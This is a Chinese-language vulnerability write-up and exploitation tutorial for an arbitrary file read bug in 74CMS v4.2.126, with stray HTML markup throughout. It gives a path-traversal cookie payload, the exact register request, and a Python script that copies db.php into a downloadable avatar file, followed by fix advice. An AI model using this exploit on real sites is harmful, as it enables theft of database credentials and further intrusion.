74CMS v4.2.126 任意文件读取漏洞分析及利用教程<\/h3>

0x00 漏洞概述<\/h4>

关键函数<\/strong>：_save_avatar()<\/code>、register()<\/code><\/li> <\/ul> 0x01 环境搭建<\/h4> 下载安装<\/strong> 官网下载基础版安装包：http:\/\/www.74cms.com\/download\/index.html<\/a><\/li> 完成安装后进入后台，检查版本并升级（若提示“域名不合法”需修改文件）：文件路径：\/Application\/Admin\/Controller\/ApplyController.class.php<\/code><\/li> 修改内容：将所有$_SERVER['HTTP_HOST']<\/code>替换为http:\/\/baidu.com<\/code><\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 0x02 漏洞原理<\/h4> 关键代码分析<\/h5> 漏洞触发点<\/strong>：_save_avatar($avatar, $uid)<\/code><\/p> 文件路径<\/strong>：\/Application\/Home\/Controller\/MembersController.class.php<\/code><\/li> 漏洞逻辑<\/strong>： $avatar<\/code>（用户可控）拼接为文件路径$path<\/code>（如Application\/Common\/Conf\/db.php<\/code>）。<\/li> 通过copy($path, $filename)<\/code>将目标文件复制为头像文件（$filename<\/code>为MD5($uid+time()<\/code>).jpg）。<\/li> 由于未校验$avatar<\/code>内容，导致任意文件读取。<\/li> <\/ul> <\/li> <\/ul> <\/li> 调用链<\/strong>：register()<\/code> → _save_avatar()<\/code><\/p> 当POST参数ucenter=bind<\/code>时，从Cookie中读取members_uc_info<\/code>和members_bind_info<\/code>数组。<\/li> 合并数组后，若$data['utype']=2<\/code>（可控）绕过注册逻辑，进入头像保存流程。<\/li> <\/ul> <\/li> <\/ol> 0x03 漏洞复现<\/h4> 利用步骤<\/h5> 构造请求<\/strong><\/p> URL<\/strong>：http:\/\/target.com\/index.php?m=Home&c=Members&a=register<\/code><\/li> POST数据<\/strong>： reg_type=2&utype=2&org=bind&ucenter=bind <\/span><\/span><\/code><\/pre><\/li> Cookie<\/strong>（关键）： members_bind_info[temp_avatar]=..\/..\/Application\/Common\/Conf\/db.php; <\/span><\/span>members_bind_info[type]=qq; <\/span><\/span>members_uc_info[password]=123456; <\/span><\/span>members_uc_info[uid]=1; <\/span><\/span>members_uc_info[username]=test; <\/span><\/span><\/code><\/pre><\/li> Headers<\/strong>： Content-Type: application\/x-www-form-urlencoded <\/span><\/span><\/span>X-Requested-With: XMLHttpRequest <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 结果获取<\/strong><\/p> 文件内容会被复制到头像目录：\/data\/upload\/avatar\/{MD5}.jpg<\/code><\/li> 通过访问生成的MD5文件名下载文件（如\/data\/upload\/avatar\/a1b2c3d4.jpg<\/code>）。<\/li> <\/ul> <\/li> <\/ol> 0x04 漏洞利用工具<\/h4> 自动化脚本<\/strong> 参考附件74cms_file_read.zip<\/code>，实现以下功能：自动发送恶意请求。<\/li> 计算目标文件的MD5路径并下载。<\/li> <\/ul> <\/li> 伪代码逻辑<\/strong>： import<\/span> requests <\/span><\/span>target =<\/span> "http:\/\/target.com"<\/span> <\/span><\/span>file_to_read =<\/span> "..\/..\/Application\/Common\/Conf\/db.php"<\/span> <\/span><\/span>cookies =<\/span> { <\/span><\/span> "members_bind_info[temp_avatar]"<\/span>: file_to_read, <\/span><\/span> "members_uc_info[uid]"<\/span>: "1"<\/span> <\/span><\/span>} <\/span><\/span>response =<\/span> requests.<\/span>post( <\/span><\/span> f<\/span>"<\/span>{<\/span>target}<\/span>\/index.php?m=Home&c=Members&a=register"<\/span>, <\/span><\/span> data=<\/span>{"ucenter"<\/span>: "bind"<\/span>, "utype"<\/span>: 2<\/span>}, <\/span><\/span> cookies=<\/span>cookies <\/span><\/span>) <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 0x05 修复建议<\/h4> 临时缓解<\/strong> 禁用register<\/code>接口或限制Cookie中members_bind_info<\/code>的输入。<\/li> <\/ul> <\/li> 官方补丁<\/strong> 升级至最新版本，或修补_save_avatar()<\/code>函数，校验$avatar<\/code>路径合法性。<\/li> <\/ul> <\/li> <\/ol> 0x06 总结<\/h4> 利用难点<\/strong>：需控制Cookie中的数组参数，但通过自动化工具可简化。<\/li> 渗透价值<\/strong>：可读取数据库配置（db.php<\/code>）、源码等敏感信息，进一步渗透服务器。<\/li> <\/ul> 附录<\/strong>：漏洞利用工具及测试环境配置脚本详见先知社区原帖附件。<\/p>